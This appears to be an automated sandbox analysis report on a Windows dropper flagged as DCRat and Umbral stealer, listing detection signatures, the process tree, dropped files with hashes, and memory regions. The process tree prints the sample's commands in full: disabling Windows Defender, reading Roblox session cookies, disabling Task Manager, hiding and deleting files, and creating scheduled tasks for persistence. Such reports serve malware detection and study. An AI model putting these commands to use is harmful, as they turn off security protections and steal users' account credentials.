Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-05-2024 01:35

General

  • Target

    a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

  • Size

    4.3MB

  • MD5

    898a94f29edc228ce3bd2054f3d5d6dd

  • SHA1

    f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5

  • SHA256

    a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37

  • SHA512

    8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae

  • SSDEEP

    49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Umbral payload 3 IoCs
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Detects executables attemping to enumerate video devices using WMI 3 IoCs
  • Detects executables containing possible sandbox analysis VM names 3 IoCs
  • Detects executables containing possible sandbox analysis VM usernames 3 IoCs
  • Detects executables containing possible sandbox system UUIDs 3 IoCs
  • Detects executables packed with SmartAssembly 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
    "C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Users\Admin\AppData\Local\Temp\stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4440
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1380
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
        3⤵
        • Views/modifies file attributes
        PID:1324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:468
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4592
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3116
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3480
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:4824
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:4124
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3404
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:3916
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2940
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • Runs ping.exe
              PID:3288
        • C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
          "C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:4468
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4532
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4900
              • C:\MsWinsessiondllNet\driverBrokercommon.exe
                "C:\MsWinsessiondllNet\driverBrokercommon.exe"
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:624
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zv5EjZvQwa.bat"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3252
                  • C:\Windows\system32\w32tm.exe
                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    7⤵
                      PID:3080
                    • C:\MsWinsessiondllNet\csrss.exe
                      "C:\MsWinsessiondllNet\csrss.exe"
                      7⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of WriteProcessMemory
                      PID:4688
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fce6a35-a5d7-4e31-8567-7bee8400eb5e.vbs"
                        8⤵
                          PID:1956
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9802ccd6-4030-46fb-b238-ffcfa505b77a.vbs"
                          8⤵
                            PID:2996
                    • C:\Windows\SysWOW64\reg.exe
                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                      5⤵
                      • Modifies registry key
                      PID:4744
              • C:\Users\Admin\AppData\Local\Temp\Inject.exe
                "C:\Users\Admin\AppData\Local\Temp\Inject.exe"
                2⤵
                • Executes dropped EXE
                PID:2808
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Links\System.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1156
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\Links\System.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:4792
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Links\System.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1544
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:3376
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2092
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:224
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2908
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:3008
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1980
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:772
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2412
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:3316
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2420
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2368
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:5000
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:3860
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2392
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:5068

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\MsWinsessiondllNet\driverBrokercommon.exe

              Filesize

              2.3MB

              MD5

              d84e590c3715c79dc5b92c435957d162

              SHA1

              2901580903e4b356448d9fe7bea510261e655363

              SHA256

              d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba

              SHA512

              b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

            • C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

              Filesize

              158B

              MD5

              ea70d7b0f1a8a1ff2d246efbdcfe1001

              SHA1

              252e762aee8fcc5761e17bb84aa3af8276852f5c

              SHA256

              1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31

              SHA512

              1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

            • C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

              Filesize

              218B

              MD5

              7c9bb5fda146efee5ee4a243d6e404b0

              SHA1

              c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd

              SHA256

              1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b

              SHA512

              797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              2KB

              MD5

              d85ba6ff808d9e5444a4b369f5bc2730

              SHA1

              31aa9d96590fff6981b315e0b391b575e4c0804a

              SHA256

              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

              SHA512

              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              944B

              MD5

              6d42b6da621e8df5674e26b799c8e2aa

              SHA1

              ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

              SHA256

              5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

              SHA512

              53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              948B

              MD5

              74a6b79d36b4aae8b027a218bc6e1af7

              SHA1

              0350e46c1df6934903c4820a00b0bc4721779e5f

              SHA256

              60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

              SHA512

              60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              276798eeb29a49dc6e199768bc9c2e71

              SHA1

              5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

              SHA256

              cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

              SHA512

              0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              ec1ba4a995d866b282087b26a0539bbc

              SHA1

              c4aeae2bc3fa9a898680648b20102f01e8a811cf

              SHA256

              469da678c3c0364b1b511962cffd44cbfc10aab5c1c528c0c09fd952f08d8a2c

              SHA512

              07bf757ec9d0d368d3ef1bfc2b562895e2708757f8fefa04fa50beaa6fb38af1018ea0cfccf5666c5c8baa4c894deead9652c53e0608aa6a83ef5b396dba43e9

            • C:\Users\Admin\AppData\Local\Temp\9802ccd6-4030-46fb-b238-ffcfa505b77a.vbs

              Filesize

              483B

              MD5

              f9b24b2604a5fb1709d7aeb35c8380da

              SHA1

              bda0adad44295bee07959b64e02afb60e803925b

              SHA256

              9e5df06a97eb719eb8b848c341304499f7d45754eeb7f6f9d74fd10f1274d585

              SHA512

              db91d73cbbe68d76655c6ddbed24f67359bea696828f986017a09dd7f7748ee687080b3437a50b8218ace0ab6c80199a21bb7c5fbe785381f7feb0a3350cceef

            • C:\Users\Admin\AppData\Local\Temp\9fce6a35-a5d7-4e31-8567-7bee8400eb5e.vbs

              Filesize

              707B

              MD5

              8a6fd60053dfa824353b3c4d7385652b

              SHA1

              b73f0af3ceda8e14f2fcb87e1d73b37d9c3f0099

              SHA256

              97a04ad395852217476be9cee64895d876911c8fc783e376e688f40590614f61

              SHA512

              dd3dc973e5e807d68b9c3949b0aa94e811458616964950ea14fbe36548f48954505c607eff28e7d0655b967f89ac3bf7f1d59983d767b7cc2d7af1469ef69a28

            • C:\Users\Admin\AppData\Local\Temp\Inject.exe

              Filesize

              75KB

              MD5

              d428ddd1b0ce85a6c96765aeaf246320

              SHA1

              d100efdaab5b2ad851fe75a28d0aa95deb920926

              SHA256

              453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb

              SHA512

              3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ax1ucl2o.gnu.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\stealer.exe

              Filesize

              229KB

              MD5

              8cc1e7cf94fec9bc505ce7411aa28861

              SHA1

              08703de84f3db427c368f16c873664d78bd83264

              SHA256

              cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba

              SHA512

              fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423

            • C:\Users\Admin\AppData\Local\Temp\zv5EjZvQwa.bat

              Filesize

              196B

              MD5

              4edf0f350e0cf1ee2376797e9b78ab70

              SHA1

              1277e43b1e4c70263b1ad6f038e7e22be4e6472c

              SHA256

              c34c9688c023666946deed786e850650c5be956b3972a4c64be9a410e43d708f

              SHA512

              24e9f03afed93ace3ec67511afade0bb71ae1b40e26435a1ba3b84fbba776447e22208119f3a732c1530259d7d7fe952088dd0d296cc851ee64908452f517a66

            • C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

              Filesize

              2.6MB

              MD5

              6216b6bef94c09a40bfa263809b1ae56

              SHA1

              a928120e65199c6aaae6c991aa0466f3f8b06020

              SHA256

              eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b

              SHA512

              0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215

            • memory/468-138-0x0000014E6E870000-0x0000014E6E892000-memory.dmp

              Filesize

              136KB

            • memory/624-238-0x000000001C530000-0x000000001C53C000-memory.dmp

              Filesize

              48KB

            • memory/624-236-0x000000001C510000-0x000000001C518000-memory.dmp

              Filesize

              32KB

            • memory/624-234-0x000000001C3E0000-0x000000001C3EA000-memory.dmp

              Filesize

              40KB

            • memory/624-235-0x000000001C3F0000-0x000000001C3FE000-memory.dmp

              Filesize

              56KB

            • memory/624-237-0x000000001C520000-0x000000001C52A000-memory.dmp

              Filesize

              40KB

            • memory/624-233-0x000000001C400000-0x000000001C408000-memory.dmp

              Filesize

              32KB

            • memory/624-231-0x00000000032C0000-0x00000000032CC000-memory.dmp

              Filesize

              48KB

            • memory/624-232-0x000000001C2D0000-0x000000001C2DC000-memory.dmp

              Filesize

              48KB

            • memory/624-225-0x0000000000EC0000-0x000000000110A000-memory.dmp

              Filesize

              2.3MB

            • memory/624-227-0x0000000001950000-0x0000000001958000-memory.dmp

              Filesize

              32KB

            • memory/624-226-0x00000000018E0000-0x00000000018E8000-memory.dmp

              Filesize

              32KB

            • memory/624-228-0x0000000001960000-0x0000000001970000-memory.dmp

              Filesize

              64KB

            • memory/624-229-0x0000000003270000-0x00000000032C6000-memory.dmp

              Filesize

              344KB

            • memory/624-230-0x0000000001970000-0x000000000197C000-memory.dmp

              Filesize

              48KB

            • memory/2808-127-0x00007FF68D870000-0x00007FF68D89A000-memory.dmp

              Filesize

              168KB

            • memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp

              Filesize

              4.3MB

            • memory/4440-165-0x0000024240820000-0x000002424083E000-memory.dmp

              Filesize

              120KB

            • memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp

              Filesize

              256KB

            • memory/4440-220-0x00007FFE3E230000-0x00007FFE3ECF1000-memory.dmp

              Filesize

              10.8MB

            • memory/4440-126-0x00007FFE3E230000-0x00007FFE3ECF1000-memory.dmp

              Filesize

              10.8MB

            • memory/4440-202-0x00000242592B0000-0x00000242592C2000-memory.dmp

              Filesize

              72KB

            • memory/4440-201-0x0000024259170000-0x000002425917A000-memory.dmp

              Filesize

              40KB

            • memory/4440-164-0x00000242593B0000-0x0000024259400000-memory.dmp

              Filesize

              320KB

            • memory/4440-62-0x00007FFE3E233000-0x00007FFE3E235000-memory.dmp

              Filesize

              8KB

            • memory/4440-163-0x0000024259330000-0x00000242593A6000-memory.dmp

              Filesize

              472KB